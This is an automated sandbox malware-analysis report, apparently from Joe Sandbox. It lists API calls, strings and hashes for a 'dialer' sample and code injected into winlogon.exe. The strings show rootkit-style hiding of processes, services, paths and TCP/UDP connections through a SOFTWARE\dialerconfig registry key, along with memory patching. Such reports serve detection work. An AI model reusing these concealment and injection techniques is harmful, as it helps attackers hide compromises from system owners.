Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction ID: e22bf671f53574c17207d2ce685d13f5af4e97122075bc82acb07468f876a556
Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction Fuzzy Hash: 9D119122A18A85C3F7608B25E8457BDA364FF49794F404239D64DCAA98EF3CD64CCF24

Function 00007FF68D3D2A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF68D3D2ACB
WriteFile.KERNEL32 ref: 00007FF68D3D2AF3
WriteFile.KERNEL32 ref: 00007FF68D3D2B16
CloseHandle.KERNEL32 ref: 00007FF68D3D2B1F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF68D3D2AA8

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction ID: f318cddbec6521c439162f064f148c1db0b94ae48ad75189058c53694bf3e3e3
Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction Fuzzy Hash: 19115E76A24B5183F7018F11E408329A760FF8AFA4F444239DA1A83B94DFBCD949CB50

Function 00007FF68D3D1914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF68D3D2138), ref: 00007FF68D3D1924
GetProcAddress.KERNEL32(?,?,00000000,00007FF68D3D2138), ref: 00007FF68D3D1937

Strings

ntdll.dll, xrefs: 00007FF68D3D191A

Memory Dump Source

Source File: 0000000E.00000002.2170932974.00007FF68D3D1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF68D3D0000, based on PE: true

Associated: 0000000E.00000002.2170892373.00007FF68D3D0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2170985137.00007FF68D3D3000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2171028816.00007FF68D3D6000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff68d3d0000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction ID: 051590e4f9f25e211291b39134c02d20ccb3c424847be2004d8f7904c2a764c6
Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction Fuzzy Hash: 07D0C754F15507C3FE195B62685417892917F5B745F444034CD1EC5350FE2CD59DCA20

Analysis Process: winlogon.exePID: 560, Parent PID: 2120COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.4%
Signature Coverage:	0%
Total number of Nodes:	107
Total number of Limit Nodes:	16

Executed Functions

Function 000002D0165E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002D0165E1633
HeapAlloc.KERNEL32 ref: 000002D0165E1642

Part of subcall function 000002D0165E1268: GetProcessHeap.KERNEL32 ref: 000002D0165E126E
Part of subcall function 000002D0165E1268: HeapAlloc.KERNEL32 ref: 000002D0165E127D
Part of subcall function 000002D0165E1268: GetProcessHeap.KERNEL32 ref: 000002D0165E1297
Part of subcall function 000002D0165E1268: HeapAlloc.KERNEL32 ref: 000002D0165E12A8

RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16B2
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DF
RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1719
RegCloseKey.ADVAPI32 ref: 000002D0165E1734
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1754
RegCloseKey.ADVAPI32 ref: 000002D0165E176F
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E178F
RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17CA
RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1805
RegCloseKey.ADVAPI32 ref: 000002D0165E1820
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1840
RegCloseKey.ADVAPI32 ref: 000002D0165E185B
RegOpenKeyExW.ADVAPI32 ref: 000002D0165E187B
RegCloseKey.ADVAPI32 ref: 000002D0165E1896
RegCloseKey.ADVAPI32 ref: 000002D0165E18A0

Part of subcall function 000002D0165E12BC: RegQueryInfoKeyW.ADVAPI32 ref: 000002D0165E1319
Part of subcall function 000002D0165E12BC: GetProcessHeap.KERNEL32 ref: 000002D0165E1327
Part of subcall function 000002D0165E12BC: HeapAlloc.KERNEL32 ref: 000002D0165E1338
Part of subcall function 000002D0165E12BC: RegEnumValueW.ADVAPI32 ref: 000002D0165E1397
Part of subcall function 000002D0165E12BC: GetProcessHeap.KERNEL32 ref: 000002D0165E13DF
Part of subcall function 000002D0165E12BC: HeapAlloc.KERNEL32 ref: 000002D0165E13ED
Part of subcall function 000002D0165E12BC: GetProcessHeap.KERNEL32 ref: 000002D0165E140A
Part of subcall function 000002D0165E12BC: HeapFree.KERNEL32 ref: 000002D0165E1418
Part of subcall function 000002D0165E12BC: lstrlenW.KERNEL32 ref: 000002D0165E1421
Part of subcall function 000002D0165E12BC: GetProcessHeap.KERNEL32 ref: 000002D0165E142F
Part of subcall function 000002D0165E12BC: HeapAlloc.KERNEL32 ref: 000002D0165E143D

Strings

paths, xrefs: 000002D0165E1788
startup, xrefs: 000002D0165E16D5
service_names, xrefs: 000002D0165E17C3
process_names, xrefs: 000002D0165E174D
SOFTWARE\dialerconfig, xrefs: 000002D0165E1692
tcp_remote, xrefs: 000002D0165E1839
tcp_local, xrefs: 000002D0165E17FE
pid, xrefs: 000002D0165E1712
udp, xrefs: 000002D0165E1874

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 5ecbaa186e8d59cd892059c32c6735f956b01256b6e0a22be3f8683e5b015701
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: EE711936210A9086EB209FB6ECD8B9973A5F784B89F801112DE4E47B78EF35C954C744

Function 000002D0165E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000002D0165E379E
GetCurrentProcess.KERNEL32 ref: 000002D0165E37CC
VirtualProtectEx.KERNEL32 ref: 000002D0165E37EE
GetCurrentProcess.KERNEL32 ref: 000002D0165E3809
VirtualProtectEx.KERNEL32 ref: 000002D0165E382A

Strings

wr, xrefs: 000002D0165E37FF

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 4674d9df3d536e982c299afeb10ddbd57cf0d0b09ef677d7c97c0013872c700b
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 6411A126305781C2FF149B61F848769B2B4F748B85F84002ADE8D03765EF3ECA05C714

Function 000002D0165E5B30 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D0165E5B6B
GetThreadContext.KERNEL32 ref: 000002D0165E5CD5

Part of subcall function 000002D0165E5960: GetCurrentThreadId.KERNEL32 ref: 000002D0165E5964

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction ID: d170addcbda7b12596392159c148f3388fdea41b115c5373cd1e58d87ea25250
Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction Fuzzy Hash: 01D18B76205B8882DB709B56E8D435AB7A0F388B88F504117EACD47BB5DF3ECA55CB40

Function 000002D0165E50D0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000002D0165E5156

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction ID: c79f08a0408f7d8f647ff0ca48cb583e9eb7eb6c6cfc1174afee583460d097fa
Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction Fuzzy Hash: 5402A832619BC486EB60CB95E89435AF7A1F3C4794F504016EACE87BA9DF7EC954CB00

Function 000002D0165E39E0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000002D0165E3A66
VirtualAlloc.KERNEL32 ref: 000002D0165E3AA0

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction ID: 28efb8197a5b457b3dea2d752150fd58e1380e9d813bcaab70eb5bc99618508c
Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction Fuzzy Hash: B9311722219AC481EF30DB95E89935EE6A0F384784F900526F5CD467B9DF7ECB808B04

Function 000002D0165E328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002D0165E32AE
PathFindFileNameW.SHLWAPI ref: 000002D0165E32BD

Part of subcall function 000002D0165E3844: StrCmpNIW.SHLWAPI ref: 000002D0165E385C

Part of subcall function 000002D0165E3790: GetModuleHandleW.KERNEL32 ref: 000002D0165E379E
Part of subcall function 000002D0165E3790: GetCurrentProcess.KERNEL32 ref: 000002D0165E37CC
Part of subcall function 000002D0165E3790: VirtualProtectEx.KERNEL32 ref: 000002D0165E37EE
Part of subcall function 000002D0165E3790: GetCurrentProcess.KERNEL32 ref: 000002D0165E3809
Part of subcall function 000002D0165E3790: VirtualProtectEx.KERNEL32 ref: 000002D0165E382A

CreateThread.KERNEL32 ref: 000002D0165E330B

Part of subcall function 000002D0165E1D14: GetCurrentThread.KERNEL32 ref: 000002D0165E1D1F

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 9ff0edd3e6e9ab198c3d17986b58ccebaadaacc8bbb4bde1db76d12e6f3558f5
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 1C1161306147C182FF6097E1FDCDB69A298AB58345FD0512BE90E815F6EF7ACE44C210

Function 000002D0165E4DF0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000002D0165E4DF4
VirtualProtect.KERNEL32 ref: 000002D0165E4E37
FlushInstructionCache.KERNEL32 ref: 000002D0165E4E4C

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction ID: d1e0e70aa0f07598b53ed8611aa5d9f6cf8e10010ed7fed8d00852c42d35725f
Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction Fuzzy Hash: FFF0BD26219B84C1DB30DB85E89575AABA0F3887D4F945117BACD47B79CA3ECA908B40

Function 000002D01658273C Relevance: 3.2, APIs: 2, Instructions: 187
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002D0165827DB
LoadLibraryA.KERNELBASE ref: 000002D01658285E

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 0197585b0632c450f7244b768ee28b396eb2739c6a19c1b09bc8c1b93abfbced
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 01610532B016D087EB54CF56988872D7B9AF754BD4F98C122DE5D07B98DA34DC92C780

Function 000002D0165E1ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002D0165E1628: GetProcessHeap.KERNEL32 ref: 000002D0165E1633
Part of subcall function 000002D0165E1628: HeapAlloc.KERNEL32 ref: 000002D0165E1642
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16B2
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DF
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1719
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1734
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1754
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E176F
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E178F
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17CA

Sleep.KERNEL32 ref: 000002D0165E1AD7
SleepEx.KERNELBASE ref: 000002D0165E1ADD

Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1805
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1820
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1840
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E185B
Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E187B
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1896
Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E18A0

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 07e4e4e3ba5978a263fb33c37be15a198cbe7b0fb120eabd57c8358f31885df7
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: D331C061A006C141FF709BA6DEC93E9B3A9AB44BC6F8454279E0E8B7B5EE15CD51C210

Function 000002D01661273C Relevance: 1.4, APIs: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000002D0166127DB

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 27b6638d6d0c71c34111095f9da34a330afb2682755feb3a9ae719f77f8aacec
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: 806157B2B012D087DB54CF5AD89472DB39AF795B94F98C52ACE5D03798DA38DC92C700

Non-executed Functions

Function 000002D0165E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002D0165E2BD0
lstrlenW.KERNEL32 ref: 000002D0165E2E0A

Part of subcall function 000002D0165E199C: OpenProcess.KERNEL32 ref: 000002D0165E19C2
Part of subcall function 000002D0165E199C: K32GetModuleFileNameExW.KERNEL32 ref: 000002D0165E19E0
Part of subcall function 000002D0165E199C: PathFindFileNameW.SHLWAPI ref: 000002D0165E19EF
Part of subcall function 000002D0165E199C: lstrlenW.KERNEL32 ref: 000002D0165E19FB
Part of subcall function 000002D0165E199C: StrCpyW.SHLWAPI ref: 000002D0165E1A0E
Part of subcall function 000002D0165E199C: CloseHandle.KERNEL32 ref: 000002D0165E1A1C

GetProcAddress.KERNEL32 ref: 000002D0165E2BE5

Part of subcall function 000002D0165E152C: StrCmpIW.SHLWAPI ref: 000002D0165E155D

Part of subcall function 000002D0165E3844: StrCmpNIW.SHLWAPI ref: 000002D0165E385C

StrCmpNIW.SHLWAPI ref: 000002D0165E2C28
lstrlenW.KERNEL32 ref: 000002D0165E2D50

Strings

\Device\Nsi, xrefs: 000002D0165E2C1B
ntdll.dll, xrefs: 000002D0165E2BC9
NtQueryObject, xrefs: 000002D0165E2BDB

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: d3b596ab05dff9b38269f4f9cd95cbcd315625dbf01702ec5e409f4043454db4
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: 40B18166210AD18AEF648FA5DD887A9B3A5FB44BC4F849017EE0D537A8DF36CE41C740

Function 000002D0165E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002D0165E7DAC
RtlCaptureContext.NTDLL ref: 000002D0165E7DD9
RtlLookupFunctionEntry.NTDLL ref: 000002D0165E7DF3
RtlVirtualUnwind.NTDLL ref: 000002D0165E7E34
IsDebuggerPresent.KERNEL32 ref: 000002D0165E7E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D0165E7EA9
UnhandledExceptionFilter.KERNEL32 ref: 000002D0165E7EB4

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 20d5fac5d31b6f1b1b7ff7f3eed5433fc4695a7276fd3db9f08efe4689facb88
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 8A311C76205BC08AEB609FA0EC947ED7365F785744F84442ADA4E57BA8EF39CA48C710

Function 000002D0165ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002D0165ED31D
RtlLookupFunctionEntry.NTDLL ref: 000002D0165ED335
RtlVirtualUnwind.NTDLL ref: 000002D0165ED370
IsDebuggerPresent.KERNEL32 ref: 000002D0165ED3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D0165ED3B3
UnhandledExceptionFilter.KERNEL32 ref: 000002D0165ED3BE

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 3b7d1831335daaf51ebfd733c592f0e35ffd938c3d674718b742b5f189087fd6
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 09314036214FC086EB60CF65EC843AE73A4F789754F940226EA9D47BA5DF39CA55CB00

Function 000002D0165E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002D0165E798C
GetCurrentThreadId.KERNEL32 ref: 000002D0165E799A
GetCurrentProcessId.KERNEL32 ref: 000002D0165E79A6
QueryPerformanceCounter.KERNEL32 ref: 000002D0165E79B6

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: 9a0ea9a6380481f60f05ebf9f0f7dac1e0ce870ea14a63a246dffcc75113e077
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 80113022714F5189EF00CFB0EC983A833A4F719758F840E26EA6D467A4DF78C5A88380

Function 000002D0165EDCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
Instruction ID: a00ea222dca1409f8d46c6c733b36e0ca5c6caa6ab5bb61d15342de0a7c0de74
Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
Instruction Fuzzy Hash: 4851C6227107D089FF20DBB6AC8879EBBA5F744794F544216EE5C27BA5DB39CA41C700

Function 000002D0165936F0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
Instruction ID: 20f132576345f14cf9ccd990e033f4922525e3259efa89c4df88ccd33cc2d552
Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
Instruction Fuzzy Hash: 1EF0FFB16156A48EDBA88FA8B85771A77A1F3483C4FD4811AD68D83E14D63CC461CF04

Function 000002D0165F6218 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301f1f65bb1fbd330af1318079875eba76c63322ed64614214bec7ea4255b521
Instruction ID: 985df637057a876432ca5168b9158af0903bded641ed0023591ab73756eca6e2
Opcode Fuzzy Hash: 301f1f65bb1fbd330af1318079875eba76c63322ed64614214bec7ea4255b521
Instruction Fuzzy Hash: B8E0ED9BA4EAE01AF7A24AB44CBF34C2F90F366B20F89408FCB94432D3D1064D018726

Function 000002D0165E12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D0165E1319
GetProcessHeap.KERNEL32 ref: 000002D0165E1327
HeapAlloc.KERNEL32 ref: 000002D0165E1338
RegEnumValueW.ADVAPI32 ref: 000002D0165E1397

Part of subcall function 000002D0165E152C: StrCmpIW.SHLWAPI ref: 000002D0165E155D

GetProcessHeap.KERNEL32 ref: 000002D0165E13DF
